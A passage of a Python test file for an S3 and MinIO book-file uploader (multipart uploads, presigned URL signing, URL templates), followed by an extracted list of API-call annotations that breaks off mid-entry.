rep.mirror_exception class AnotherFailingMultipartS3Upload(MockMultipartS3Upload): def complete(self): raise Exception("Error!") rep.mirror_exception = None # Failed during completion with s3.multipart_upload( rep, rep.url, upload_class=AnotherFailingMultipartS3Upload ) as upload: upload.upload_part("Part 1") assert False == MockMultipartS3Upload.completed assert True == MockMultipartS3Upload.aborted assert "Error!" == rep.mirror_exception @parameterized.expand( [ ( "default_expiration_parameter", None, int(S3UploaderConfiguration.S3_DEFAULT_PRESIGNED_URL_EXPIRATION), ), ( "empty_expiration_parameter", {S3UploaderConfiguration.S3_PRESIGNED_URL_EXPIRATION: 100}, 100, ), ] ) def test_sign_url(self, name, expiration_settings, expected_expiration): # Arrange region = "us-east-1" bucket = "bucket" filename = "filename" url = "https://{0}.s3.{1}.amazonaws.com/{2}".format(bucket, region, filename) expected_url = url + "?AWSAccessKeyId=KEY&Expires=1&Signature=S" settings = expiration_settings if expiration_settings else {} s3_uploader = self._create_s3_uploader(region=region, **settings) s3_uploader.split_url = MagicMock(return_value=(bucket, filename)) s3_uploader.client.generate_presigned_url = MagicMock(return_value=expected_url) # Act result = s3_uploader.sign_url(url) # Assert assert result == expected_url s3_uploader.split_url.assert_called_once_with(url) s3_uploader.client.generate_presigned_url.assert_called_once_with( "get_object", ExpiresIn=expected_expiration, Params={"Bucket": bucket, "Key": filename}, ) class TestMultiPartS3Upload(S3UploaderTest): def _representation(self): rep, ignore = create( self._db, Representation, url="http://bucket/books.mrc", media_type=Representation.MARC_MEDIA_TYPE, ) return rep def test_init(self): uploader = self._create_s3_uploader(MockS3Client) rep = self._representation() upload = MultipartS3Upload(uploader, rep, rep.url) assert uploader == upload.uploader assert rep == upload.representation assert "bucket" == upload.bucket assert "books.mrc" == upload.filename assert 1 == upload.part_number assert [] == upload.parts assert 1 == upload.upload.get("UploadId") uploader.client.fail_with = Exception("Error!") pytest.raises(Exception, MultipartS3Upload, uploader, rep, rep.url) def test_upload_part(self): uploader = self._create_s3_uploader(MockS3Client) rep = self._representation() upload = MultipartS3Upload(uploader, rep, rep.url) upload.upload_part("Part 1") upload.upload_part("Part 2") assert [ { "Body": "Part 1", "UploadId": 1, "PartNumber": 1, "Bucket": "bucket", "Key": "books.mrc", }, { "Body": "Part 2", "UploadId": 1, "PartNumber": 2, "Bucket": "bucket", "Key": "books.mrc", }, ] == uploader.client.parts assert 3 == upload.part_number assert [ {"ETag": "etag", "PartNumber": 1}, {"ETag": "etag", "PartNumber": 2}, ] == upload.parts uploader.client.fail_with = Exception("Error!") pytest.raises(Exception, upload.upload_part, "Part 3") def test_complete(self): uploader = self._create_s3_uploader(MockS3Client) rep = self._representation() upload = MultipartS3Upload(uploader, rep, rep.url) upload.upload_part("Part 1") upload.upload_part("Part 2") upload.complete() assert [ { "Bucket": "bucket", "Key": "books.mrc", "UploadId": 1, "MultipartUpload": { "Parts": [ {"ETag": "etag", "PartNumber": 1}, {"ETag": "etag", "PartNumber": 2}, ], }, } ] == uploader.client.uploads def test_abort(self): uploader = self._create_s3_uploader(MockS3Client) rep = self._representation() upload = MultipartS3Upload(uploader, rep, rep.url) upload.upload_part("Part 1") upload.upload_part("Part 2") upload.abort() assert [] == uploader.client.parts @pytest.mark.minio class TestS3UploaderIntegration(S3UploaderIntegrationTest): @parameterized.expand( [ ( "using_s3_uploader_and_open_access_bucket", functools.partial( S3Uploader, host=S3UploaderIntegrationTest.SIMPLIFIED_TEST_MINIO_HOST, ), S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY, "test-bucket", True, ), ( "using_s3_uploader_and_protected_access_bucket", functools.partial( S3Uploader, host=S3UploaderIntegrationTest.SIMPLIFIED_TEST_MINIO_HOST, ), S3UploaderConfiguration.PROTECTED_CONTENT_BUCKET_KEY, "test-bucket", False, ), ( "using_minio_uploader_and_open_access_bucket", MinIOUploader, S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY, "test-bucket", True, { MinIOUploaderConfiguration.ENDPOINT_URL: S3UploaderIntegrationTest.SIMPLIFIED_TEST_MINIO_ENDPOINT_URL }, ), ( "using_minio_uploader_and_protected_access_bucket", MinIOUploader, S3UploaderConfiguration.PROTECTED_CONTENT_BUCKET_KEY, "test-bucket", False, { MinIOUploaderConfiguration.ENDPOINT_URL: S3UploaderIntegrationTest.SIMPLIFIED_TEST_MINIO_ENDPOINT_URL }, ), ] ) def test_mirror( self, name, uploader_class, bucket_type, bucket_name, open_access, settings=None ): # Arrange book_title = "1234567890" book_content = "1234567890" identifier = Identifier(type=Identifier.ISBN, identifier=book_title) representation = Representation( content=book_content, media_type=Representation.EPUB_MEDIA_TYPE ) buckets = { bucket_type: bucket_name, } if settings: settings.update(buckets) else: settings = buckets s3_uploader = self._create_s3_uploader( uploader_class=uploader_class, **settings ) self.minio_s3_client.create_bucket(Bucket=bucket_name) # Act book_url = s3_uploader.book_url(identifier, open_access=open_access) s3_uploader.mirror_one(representation, book_url) # Assert response = self.minio_s3_client.list_objects(Bucket=bucket_name) assert "Contents" in response assert len(response["Contents"]) == 1 [object] = response["Contents"] assert object["Key"] == "ISBN/{0}.epub".format(book_title)
[((3093, 3170), 'os.environ.get', 'os.environ.get', (['"""SIMPLIFIED_TEST_MINIO_ENDPOINT_URL"""', '"""http://localhost:9000"""'], {}), "('SIMPLIFIED_TEST_MINIO_ENDPOINT_URL', 'http://localhost:9000')\n", (3107, 3170), False, 'import os\n'), ((3218, 3276), 'os.environ.get', 'os.environ.get', (['"""SIMPLIFIED_TEST_MINIO_USER"""', '"""minioadmin"""'], {}), "('SIMPLIFIED_TEST_MINIO_USER', 'minioadmin')\n", (3232, 3276), False, 'import os\n'), ((3328, 3390), 'os.environ.get', 'os.environ.get', (['"""SIMPLIFIED_TEST_MINIO_PASSWORD"""', '"""minioadmin"""'], {}), "('SIMPLIFIED_TEST_MINIO_PASSWORD', 'minioadmin')\n", (3342, 3390), False, 'import os\n'), ((3450, 3494), 'urllib.parse.urlsplit', 'urlsplit', (['SIMPLIFIED_TEST_MINIO_ENDPOINT_URL'], {}), '(SIMPLIFIED_TEST_MINIO_ENDPOINT_URL)\n', (3458, 3494), False, 'from urllib.parse import urlsplit\n'), ((7694, 7856), 'parameterized.parameterized.expand', 'parameterized.expand', (["[('empty_credentials', None, None), ('empty_string_credentials', '', ''), (\n 'non_empty_string_credentials', 'username', 'password')]"], {}), "([('empty_credentials', None, None), (\n 'empty_string_credentials', '', ''), ('non_empty_string_credentials',\n 'username', 'password')])\n", (7714, 7856), False, 'from parameterized import parameterized\n'), ((10945, 12972), 'parameterized.parameterized.expand', 'parameterized.expand', (["[('s3_url_with_path_without_slash', 'a-bucket', 'a-path',\n 'https://a-bucket.s3.amazonaws.com/a-path', None), (\n 's3_dummy_url_with_path_without_slash', 'dummy', 'dummy',\n 'https://dummy.s3.amazonaws.com/dummy', None), (\n 's3_path_style_url_with_path_without_slash', 'a-bucket', 'a-path',\n 'https://s3.amazonaws.com/a-bucket/a-path', None, S3AddressingStyle.\n PATH.value), ('s3_path_style_dummy_url_with_path_without_slash',\n 'dummy', 'dummy', 'https://s3.amazonaws.com/dummy/dummy', None,\n S3AddressingStyle.PATH.value), ('s3_url_with_path_with_slash',\n 'a-bucket', '/a-path', 'https://a-bucket.s3.amazonaws.com/a-path', None\n ), ('s3_path_style_url_with_path_with_slash', 'a-bucket', '/a-path',\n 'https://s3.amazonaws.com/a-bucket/a-path', None, S3AddressingStyle.\n PATH.value), ('s3_url_with_custom_region_and_path_without_slash',\n 'a-bucket', 'a-path',\n 'https://a-bucket.s3.us-east-2.amazonaws.com/a-path', 'us-east-2'), (\n 's3_path_style_url_with_custom_region_and_path_without_slash',\n 'a-bucket', 'a-path',\n 'https://s3.us-east-2.amazonaws.com/a-bucket/a-path', 'us-east-2',\n S3AddressingStyle.PATH.value), (\n 's3_url_with_custom_region_and_path_with_slash', 'a-bucket', '/a-path',\n 'https://a-bucket.s3.us-east-3.amazonaws.com/a-path', 'us-east-3'), (\n 's3_path_style_url_with_custom_region_and_path_with_slash', 'a-bucket',\n '/a-path', 'https://s3.us-east-3.amazonaws.com/a-bucket/a-path',\n 'us-east-3', S3AddressingStyle.PATH.value), (\n 'custom_http_url_and_path_without_slash', 'http://a-bucket.com/',\n 'a-path', 'http://a-bucket.com/a-path', None), (\n 'custom_http_url_and_path_with_slash', 'http://a-bucket.com/',\n '/a-path', 'http://a-bucket.com/a-path', None), (\n 'custom_http_url_and_path_without_slash', 'https://a-bucket.com/',\n 'a-path', 'https://a-bucket.com/a-path', None), (\n 'custom_http_url_and_path_with_slash', 'https://a-bucket.com/',\n '/a-path', 'https://a-bucket.com/a-path', None)]"], {}), "([('s3_url_with_path_without_slash', 'a-bucket',\n 'a-path', 'https://a-bucket.s3.amazonaws.com/a-path', None), (\n 's3_dummy_url_with_path_without_slash', 'dummy', 'dummy',\n 'https://dummy.s3.amazonaws.com/dummy', None), (\n 's3_path_style_url_with_path_without_slash', 'a-bucket', 'a-path',\n 'https://s3.amazonaws.com/a-bucket/a-path', None, S3AddressingStyle.\n PATH.value), ('s3_path_style_dummy_url_with_path_without_slash',\n 'dummy', 'dummy', 'https://s3.amazonaws.com/dummy/dummy', None,\n S3AddressingStyle.PATH.value), ('s3_url_with_path_with_slash',\n 'a-bucket', '/a-path', 'https://a-bucket.s3.amazonaws.com/a-path', None\n ), ('s3_path_style_url_with_path_with_slash', 'a-bucket', '/a-path',\n 'https://s3.amazonaws.com/a-bucket/a-path', None, S3AddressingStyle.\n PATH.value), ('s3_url_with_custom_region_and_path_without_slash',\n 'a-bucket', 'a-path',\n 'https://a-bucket.s3.us-east-2.amazonaws.com/a-path', 'us-east-2'), (\n 's3_path_style_url_with_custom_region_and_path_without_slash',\n 'a-bucket', 'a-path',\n 'https://s3.us-east-2.amazonaws.com/a-bucket/a-path', 'us-east-2',\n S3AddressingStyle.PATH.value), (\n 's3_url_with_custom_region_and_path_with_slash', 'a-bucket', '/a-path',\n 'https://a-bucket.s3.us-east-3.amazonaws.com/a-path', 'us-east-3'), (\n 's3_path_style_url_with_custom_region_and_path_with_slash', 'a-bucket',\n '/a-path', 'https://s3.us-east-3.amazonaws.com/a-bucket/a-path',\n 'us-east-3', S3AddressingStyle.PATH.value), (\n 'custom_http_url_and_path_without_slash', 'http://a-bucket.com/',\n 'a-path', 'http://a-bucket.com/a-path', None), (\n 'custom_http_url_and_path_with_slash', 'http://a-bucket.com/',\n '/a-path', 'http://a-bucket.com/a-path', None), (\n 'custom_http_url_and_path_without_slash', 'https://a-bucket.com/',\n 'a-path', 'https://a-bucket.com/a-path', None), (\n 'custom_http_url_and_path_with_slash', 'https://a-bucket.com/',\n '/a-path', 'https://a-bucket.com/a-path', None)])\n", (10965, 12972), False, 'from parameterized import parameterized\n'), ((14809, 15699), 'parameterized.parameterized.expand', 'parameterized.expand', (["[('implicit_s3_url_template', 'bucket', 'the key',\n 'https://bucket.s3.amazonaws.com/the%20key'), (\n 'implicit_s3_url_template_with_custom_region', 'bucket', 'the key',\n 'https://bucket.s3.us-east-2.amazonaws.com/the%20key', None,\n 'us-east-2'), ('explicit_s3_url_template', 'bucket', 'the key',\n 'https://bucket.s3.amazonaws.com/the%20key', S3UploaderConfiguration.\n URL_TEMPLATE_DEFAULT), ('explicit_s3_url_template_with_custom_region',\n 'bucket', 'the key',\n 'https://bucket.s3.us-east-2.amazonaws.com/the%20key',\n S3UploaderConfiguration.URL_TEMPLATE_DEFAULT, 'us-east-2'), (\n 'http_url_template', 'bucket', 'the këy',\n 'http://bucket/the%20k%C3%ABy', S3UploaderConfiguration.\n URL_TEMPLATE_HTTP), ('https_url_template', 'bucket', 'the këy',\n 'https://bucket/the%20k%C3%ABy', S3UploaderConfiguration.\n URL_TEMPLATE_HTTPS)]"], {}), "([('implicit_s3_url_template', 'bucket', 'the key',\n 'https://bucket.s3.amazonaws.com/the%20key'), (\n 'implicit_s3_url_template_with_custom_region', 'bucket', 'the key',\n 'https://bucket.s3.us-east-2.amazonaws.com/the%20key', None,\n 'us-east-2'), ('explicit_s3_url_template', 'bucket', 'the key',\n 'https://bucket.s3.amazonaws.com/the%20key', S3UploaderConfiguration.\n URL_TEMPLATE_DEFAULT), ('explicit_s3_url_template_with_custom_region',\n 'bucket', 'the key',\n 'https://bucket.s3.us-east-2.amazonaws.com/the%20key',\n S3UploaderConfiguration.URL_TEMPLATE_DEFAULT, 'us-east-2'), (\n 'http_url_template', 'bucket', 'the këy',\n 'http://bucket/the%20k%C3%ABy', S3UploaderConfiguration.\n URL_TEMPLATE_HTTP), ('https_url_template', 'bucket', 'the këy',\n 'https://bucket/the%20k%C3%ABy', S3UploaderConfiguration.\n URL_TEMPLATE_HTTPS)])\n", (14829, 15699), False, 'from parameterized import parameterized\n'), ((17198, 18493), 'parameterized.parameterized.expand', 'parameterized.expand', (["[('with_gutenberg_cover_generator_data_source',\n 'test-book-covers-s3-bucket', DataSource.GUTENBERG_COVER_GENERATOR,\n 'https://test-book-covers-s3-bucket.s3.amazonaws.com/Gutenberg%20Illustrated/'\n ), ('with_overdrive_data_source', 'test-book-covers-s3-bucket',\n DataSource.OVERDRIVE,\n 'https://test-book-covers-s3-bucket.s3.amazonaws.com/Overdrive/'), (\n 'with_overdrive_data_source_and_scaled_size',\n 'test-book-covers-s3-bucket', DataSource.OVERDRIVE,\n 'https://test-book-covers-s3-bucket.s3.amazonaws.com/scaled/300/Overdrive/'\n , 300), ('with_gutenberg_cover_generator_data_source_and_custom_region',\n 'test-book-covers-s3-bucket', DataSource.GUTENBERG_COVER_GENERATOR,\n 'https://test-book-covers-s3-bucket.s3.us-east-3.amazonaws.com/Gutenberg%20Illustrated/'\n , None, 'us-east-3'), ('with_overdrive_data_source_and_custom_region',\n 'test-book-covers-s3-bucket', DataSource.OVERDRIVE,\n 'https://test-book-covers-s3-bucket.s3.us-east-3.amazonaws.com/Overdrive/',\n None, 'us-east-3'), (\n 'with_overdrive_data_source_and_scaled_size_and_custom_region',\n 'test-book-covers-s3-bucket', DataSource.OVERDRIVE,\n 'https://test-book-covers-s3-bucket.s3.us-east-3.amazonaws.com/scaled/300/Overdrive/'\n , 300, 'us-east-3')]"], {}), "([('with_gutenberg_cover_generator_data_source',\n 'test-book-covers-s3-bucket', DataSource.GUTENBERG_COVER_GENERATOR,\n 'https://test-book-covers-s3-bucket.s3.amazonaws.com/Gutenberg%20Illustrated/'\n ), ('with_overdrive_data_source', 'test-book-covers-s3-bucket',\n DataSource.OVERDRIVE,\n 'https://test-book-covers-s3-bucket.s3.amazonaws.com/Overdrive/'), (\n 'with_overdrive_data_source_and_scaled_size',\n 'test-book-covers-s3-bucket', DataSource.OVERDRIVE,\n 'https://test-book-covers-s3-bucket.s3.amazonaws.com/scaled/300/Overdrive/'\n , 300), ('with_gutenberg_cover_generator_data_source_and_custom_region',\n 'test-book-covers-s3-bucket', DataSource.GUTENBERG_COVER_GENERATOR,\n 'https://test-book-covers-s3-bucket.s3.us-east-3.amazonaws.com/Gutenberg%20Illustrated/'\n , None, 'us-east-3'), ('with_overdrive_data_source_and_custom_region',\n 'test-book-covers-s3-bucket', DataSource.OVERDRIVE,\n 'https://test-book-covers-s3-bucket.s3.us-east-3.amazonaws.com/Overdrive/',\n None, 'us-east-3'), (\n 'with_overdrive_data_source_and_scaled_size_and_custom_region',\n 'test-book-covers-s3-bucket', DataSource.OVERDRIVE,\n 'https://test-book-covers-s3-bucket.s3.us-east-3.amazonaws.com/scaled/300/Overdrive/'\n , 300, 'us-east-3')])\n", (17218, 18493), False, 'from parameterized import parameterized\n'), ((19589, 19872), 'parameterized.parameterized.expand', 'parameterized.expand', (["[('with_default_region', 'test-open-access-s3-bucket',\n 'https://test-open-access-s3-bucket.s3.amazonaws.com/'), (\n 'with_custom_region', 'test-open-access-s3-bucket',\n 'https://test-open-access-s3-bucket.s3.us-east-3.amazonaws.com/',\n 'us-east-3')]"], {}), "([('with_default_region', 'test-open-access-s3-bucket',\n 'https://test-open-access-s3-bucket.s3.amazonaws.com/'), (\n 'with_custom_region', 'test-open-access-s3-bucket',\n 'https://test-open-access-s3-bucket.s3.us-east-3.amazonaws.com/',\n 'us-east-3')])\n", (19609, 19872), False, 'from parameterized import parameterized\n'), ((20328, 20766), 'parameterized.parameterized.expand', 'parameterized.expand', (["[('s3_url', 'test-marc-s3-bucket', 'SHORT',\n 'https://test-marc-s3-bucket.s3.amazonaws.com/SHORT/'), (\n 's3_url_with_custom_region', 'test-marc-s3-bucket', 'SHORT',\n 'https://test-marc-s3-bucket.s3.us-east-2.amazonaws.com/SHORT/',\n 'us-east-2'), ('custom_http_url', 'http://my-feed/', 'SHORT',\n 'http://my-feed/SHORT/'), ('custom_https_url', 'https://my-feed/',\n 'SHORT', 'https://my-feed/SHORT/')]"], {}), "([('s3_url', 'test-marc-s3-bucket', 'SHORT',\n 'https://test-marc-s3-bucket.s3.amazonaws.com/SHORT/'), (\n 's3_url_with_custom_region', 'test-marc-s3-bucket', 'SHORT',\n 'https://test-marc-s3-bucket.s3.us-east-2.amazonaws.com/SHORT/',\n 'us-east-2'), ('custom_http_url', 'http://my-feed/', 'SHORT',\n 'http://my-feed/SHORT/'), ('custom_https_url', 'https://my-feed/',\n 'SHORT', 'https://my-feed/SHORT/')])\n", (20348, 20766), False, 'from parameterized import parameterized\n'), ((21368, 23249), 'parameterized.parameterized.expand', 'parameterized.expand', (["[('with_identifier', {S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY:\n 'thebooks'}, 'ABOOK',\n 'https://thebooks.s3.amazonaws.com/Gutenberg%20ID/ABOOK.epub'), (\n 'with_custom_extension', {S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY:\n 'thebooks'}, 'ABOOK',\n 'https://thebooks.s3.amazonaws.com/Gutenberg%20ID/ABOOK.pdf', 'pdf'), (\n 'with_custom_dotted_extension', {S3UploaderConfiguration.\n OA_CONTENT_BUCKET_KEY: 'thebooks'}, 'ABOOK',\n 'https://thebooks.s3.amazonaws.com/Gutenberg%20ID/ABOOK.pdf', '.pdf'),\n ('with_custom_data_source', {S3UploaderConfiguration.\n OA_CONTENT_BUCKET_KEY: 'thebooks'}, 'ABOOK',\n 'https://thebooks.s3.amazonaws.com/unglue.it/Gutenberg%20ID/ABOOK.epub',\n None, DataSource.UNGLUE_IT), ('with_custom_title', {\n S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY: 'thebooks'}, 'ABOOK',\n 'https://thebooks.s3.amazonaws.com/Gutenberg%20ID/ABOOK/On%20Books.epub',\n None, None, 'On Books'), (\n 'with_custom_extension_and_title_and_data_source', {\n S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY: 'thebooks'}, 'ABOOK',\n 'https://thebooks.s3.amazonaws.com/unglue.it/Gutenberg%20ID/ABOOK/On%20Books.pdf'\n , '.pdf', DataSource.UNGLUE_IT, 'On Books'), (\n 'with_custom_extension_and_title_and_data_source_and_region', {\n S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY: 'thebooks'}, 'ABOOK',\n 'https://thebooks.s3.us-east-3.amazonaws.com/unglue.it/Gutenberg%20ID/ABOOK/On%20Books.pdf'\n , '.pdf', DataSource.UNGLUE_IT, 'On Books', 'us-east-3'), (\n 'with_protected_access_and_custom_extension_and_title_and_data_source_and_region'\n , {S3UploaderConfiguration.PROTECTED_CONTENT_BUCKET_KEY: 'thebooks'},\n 'ABOOK',\n 'https://thebooks.s3.us-east-3.amazonaws.com/unglue.it/Gutenberg%20ID/ABOOK/On%20Books.pdf'\n , '.pdf', DataSource.UNGLUE_IT, 'On Books', 'us-east-3', False)]"], {}), "([('with_identifier', {S3UploaderConfiguration.\n OA_CONTENT_BUCKET_KEY: 'thebooks'}, 'ABOOK',\n 'https://thebooks.s3.amazonaws.com/Gutenberg%20ID/ABOOK.epub'), (\n 'with_custom_extension', {S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY:\n 'thebooks'}, 'ABOOK',\n 'https://thebooks.s3.amazonaws.com/Gutenberg%20ID/ABOOK.pdf', 'pdf'), (\n 'with_custom_dotted_extension', {S3UploaderConfiguration.\n OA_CONTENT_BUCKET_KEY: 'thebooks'}, 'ABOOK',\n 'https://thebooks.s3.amazonaws.com/Gutenberg%20ID/ABOOK.pdf', '.pdf'),\n ('with_custom_data_source', {S3UploaderConfiguration.\n OA_CONTENT_BUCKET_KEY: 'thebooks'}, 'ABOOK',\n 'https://thebooks.s3.amazonaws.com/unglue.it/Gutenberg%20ID/ABOOK.epub',\n None, DataSource.UNGLUE_IT), ('with_custom_title', {\n S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY: 'thebooks'}, 'ABOOK',\n 'https://thebooks.s3.amazonaws.com/Gutenberg%20ID/ABOOK/On%20Books.epub',\n None, None, 'On Books'), (\n 'with_custom_extension_and_title_and_data_source', {\n S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY: 'thebooks'}, 'ABOOK',\n 'https://thebooks.s3.amazonaws.com/unglue.it/Gutenberg%20ID/ABOOK/On%20Books.pdf'\n , '.pdf', DataSource.UNGLUE_IT, 'On Books'), (\n 'with_custom_extension_and_title_and_data_source_and_region', {\n S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY: 'thebooks'}, 'ABOOK',\n 'https://thebooks.s3.us-east-3.amazonaws.com/unglue.it/Gutenberg%20ID/ABOOK/On%20Books.pdf'\n , '.pdf', DataSource.UNGLUE_IT, 'On Books', 'us-east-3'), (\n 'with_protected_access_and_custom_extension_and_title_and_data_source_and_region'\n , {S3UploaderConfiguration.PROTECTED_CONTENT_BUCKET_KEY: 'thebooks'},\n 'ABOOK',\n 'https://thebooks.s3.us-east-3.amazonaws.com/unglue.it/Gutenberg%20ID/ABOOK/On%20Books.pdf'\n , '.pdf', DataSource.UNGLUE_IT, 'On Books', 'us-east-3', False)])\n", (21388, 23249), False, 'from parameterized import parameterized\n'), ((25064, 26113), 'parameterized.parameterized.expand', 'parameterized.expand', (["[('without_scaled_size', {S3UploaderConfiguration.BOOK_COVERS_BUCKET_KEY:\n 'thecovers'}, DataSource.UNGLUE_IT, 'ABOOK', 'filename',\n 'https://thecovers.s3.amazonaws.com/unglue.it/Gutenberg%20ID/ABOOK/filename'\n ), ('without_scaled_size_and_with_custom_region', {\n S3UploaderConfiguration.BOOK_COVERS_BUCKET_KEY: 'thecovers'},\n DataSource.UNGLUE_IT, 'ABOOK', 'filename',\n 'https://thecovers.s3.us-east-3.amazonaws.com/unglue.it/Gutenberg%20ID/ABOOK/filename'\n , None, 'us-east-3'), ('with_scaled_size', {S3UploaderConfiguration.\n BOOK_COVERS_BUCKET_KEY: 'thecovers'}, DataSource.UNGLUE_IT, 'ABOOK',\n 'filename',\n 'https://thecovers.s3.amazonaws.com/scaled/601/unglue.it/Gutenberg%20ID/ABOOK/filename'\n , 601), ('with_scaled_size_and_custom_region', {S3UploaderConfiguration\n .BOOK_COVERS_BUCKET_KEY: 'thecovers'}, DataSource.UNGLUE_IT, 'ABOOK',\n 'filename',\n 'https://thecovers.s3.us-east-3.amazonaws.com/scaled/601/unglue.it/Gutenberg%20ID/ABOOK/filename'\n , 601, 'us-east-3')]"], {}), "([('without_scaled_size', {S3UploaderConfiguration.\n BOOK_COVERS_BUCKET_KEY: 'thecovers'}, DataSource.UNGLUE_IT, 'ABOOK',\n 'filename',\n 'https://thecovers.s3.amazonaws.com/unglue.it/Gutenberg%20ID/ABOOK/filename'\n ), ('without_scaled_size_and_with_custom_region', {\n S3UploaderConfiguration.BOOK_COVERS_BUCKET_KEY: 'thecovers'},\n DataSource.UNGLUE_IT, 'ABOOK', 'filename',\n 'https://thecovers.s3.us-east-3.amazonaws.com/unglue.it/Gutenberg%20ID/ABOOK/filename'\n , None, 'us-east-3'), ('with_scaled_size', {S3UploaderConfiguration.\n BOOK_COVERS_BUCKET_KEY: 'thecovers'}, DataSource.UNGLUE_IT, 'ABOOK',\n 'filename',\n 'https://thecovers.s3.amazonaws.com/scaled/601/unglue.it/Gutenberg%20ID/ABOOK/filename'\n , 601), ('with_scaled_size_and_custom_region', {S3UploaderConfiguration\n .BOOK_COVERS_BUCKET_KEY: 'thecovers'}, DataSource.UNGLUE_IT, 'ABOOK',\n 'filename',\n 'https://thecovers.s3.us-east-3.amazonaws.com/scaled/601/unglue.it/Gutenberg%20ID/ABOOK/filename'\n , 601, 'us-east-3')])\n", (25084, 26113), False, 'from parameterized import parameterized\n'), ((30432, 31933), 'parameterized.parameterized.expand', 'parameterized.expand', (["[('s3_path_style_request_without_region',\n 'https://s3.amazonaws.com/bucket/directory/filename.jpg', ('bucket',\n 'directory/filename.jpg')), ('s3_path_style_request_with_region',\n 'https://s3.us-east-2.amazonaws.com/bucket/directory/filename.jpg', (\n 'bucket', 'directory/filename.jpg')), (\n 's3_virtual_hosted_style_request_with_global_endpoint',\n 'https://bucket.s3.amazonaws.com/directory/filename.jpg', ('bucket',\n 'directory/filename.jpg')), (\n 's3_virtual_hosted_style_request_with_dashed_region',\n 'https://bucket.s3-us-east-2.amazonaws.com/directory/filename.jpg', (\n 'bucket', 'directory/filename.jpg')), (\n 's3_virtual_hosted_style_request_with_dotted_region',\n 'https://bucket.s3.us-east-2.amazonaws.com/directory/filename.jpg', (\n 'bucket', 'directory/filename.jpg')), ('http_url',\n 'http://book-covers.nypl.org/directory/filename.jpg', (\n 'book-covers.nypl.org', 'directory/filename.jpg')), ('https_url',\n 'https://book-covers.nypl.org/directory/filename.jpg', (\n 'book-covers.nypl.org', 'directory/filename.jpg')), (\n 'http_url_with_escaped_symbols',\n 'http://book-covers.nypl.org/directory/filename+with+spaces%21.jpg', (\n 'book-covers.nypl.org', 'directory/filename with spaces!.jpg')), (\n 'http_url_with_escaped_symbols_but_unquote_set_to_false',\n 'http://book-covers.nypl.org/directory/filename+with+spaces%21.jpg', (\n 'book-covers.nypl.org', 'directory/filename+with+spaces%21.jpg'), False)]"], {}), "([('s3_path_style_request_without_region',\n 'https://s3.amazonaws.com/bucket/directory/filename.jpg', ('bucket',\n 'directory/filename.jpg')), ('s3_path_style_request_with_region',\n 'https://s3.us-east-2.amazonaws.com/bucket/directory/filename.jpg', (\n 'bucket', 'directory/filename.jpg')), (\n 's3_virtual_hosted_style_request_with_global_endpoint',\n 'https://bucket.s3.amazonaws.com/directory/filename.jpg', ('bucket',\n 'directory/filename.jpg')), (\n 's3_virtual_hosted_style_request_with_dashed_region',\n 'https://bucket.s3-us-east-2.amazonaws.com/directory/filename.jpg', (\n 'bucket', 'directory/filename.jpg')), (\n 's3_virtual_hosted_style_request_with_dotted_region',\n 'https://bucket.s3.us-east-2.amazonaws.com/directory/filename.jpg', (\n 'bucket', 'directory/filename.jpg')), ('http_url',\n 'http://book-covers.nypl.org/directory/filename.jpg', (\n 'book-covers.nypl.org', 'directory/filename.jpg')), ('https_url',\n 'https://book-covers.nypl.org/directory/filename.jpg', (\n 'book-covers.nypl.org', 'directory/filename.jpg')), (\n 'http_url_with_escaped_symbols',\n 'http://book-covers.nypl.org/directory/filename+with+spaces%21.jpg', (\n 'book-covers.nypl.org', 'directory/filename with spaces!.jpg')), (\n 'http_url_with_escaped_symbols_but_unquote_set_to_false',\n 'http://book-covers.nypl.org/directory/filename+with+spaces%21.jpg', (\n 'book-covers.nypl.org', 'directory/filename+with+spaces%21.jpg'), False)])\n", (30452, 31933), False, 'from parameterized import parameterized\n'), ((3943, 4203), 'boto3.client', 'boto3.client', (['"""s3"""'], {'aws_access_key_id': 'TestS3UploaderIntegration.SIMPLIFIED_TEST_MINIO_USER', 'aws_secret_access_key': 'TestS3UploaderIntegration.SIMPLIFIED_TEST_MINIO_PASSWORD', 'endpoint_url': 'TestS3UploaderIntegration.SIMPLIFIED_TEST_MINIO_ENDPOINT_URL'}), "('s3', aws_access_key_id=TestS3UploaderIntegration.\n SIMPLIFIED_TEST_MINIO_USER, aws_secret_access_key=\n TestS3UploaderIntegration.SIMPLIFIED_TEST_MINIO_PASSWORD, endpoint_url=\n TestS3UploaderIntegration.SIMPLIFIED_TEST_MINIO_ENDPOINT_URL)\n", (3955, 4203), False, 'import boto3\n'), ((4278, 4389), 'functools.partial', 'functools.partial', (['boto3.client'], {'endpoint_url': 'TestS3UploaderIntegration.SIMPLIFIED_TEST_MINIO_ENDPOINT_URL'}), '(boto3.client, endpoint_url=TestS3UploaderIntegration.\n SIMPLIFIED_TEST_MINIO_ENDPOINT_URL)\n', (4295, 4389), False, 'import functools\n'), ((8253, 8264), 'mock.MagicMock', 'MagicMock', ([], {}), '()\n', (8262, 8264), False, 'from mock import MagicMock\n'), ((36178, 36193), 'botocore.exceptions.BotoCoreError', 'BotoCoreError', ([], {}), '()\n', (36191, 36193), False, 'from botocore.exceptions import BotoCoreError, ClientError\n'), ((36583, 36621), 'botocore.exceptions.ClientError', 'ClientError', (['response', '"""SomeOperation"""'], {}), "(response, 'SomeOperation')\n", (36594, 36621), False, 'from botocore.exceptions import BotoCoreError, ClientError\n'), ((37127, 37193), 'pytest.raises', 'pytest.raises', (['Exception', 'uploader.mirror_one', 'epub_rep', 'self._url'], {}), '(Exception, uploader.mirror_one, epub_rep, self._url)\n', (37140, 37193), False, 'import pytest\n'), ((41562, 41604), 'mock.MagicMock', 'MagicMock', ([], {'return_value': '(bucket, filename)'}), '(return_value=(bucket, filename))\n', (41571, 41604), False, 'from mock import MagicMock\n'), ((41657, 41693), 'mock.MagicMock', 'MagicMock', ([], {'return_value': 'expected_url'}), '(return_value=expected_url)\n', (41666, 41693), False, 'from mock import MagicMock\n'), ((42904, 42971), 'pytest.raises', 'pytest.raises', (['Exception', 'MultipartS3Upload', 'uploader', 'rep', 'rep.url'], {}), '(Exception, MultipartS3Upload, uploader, rep, 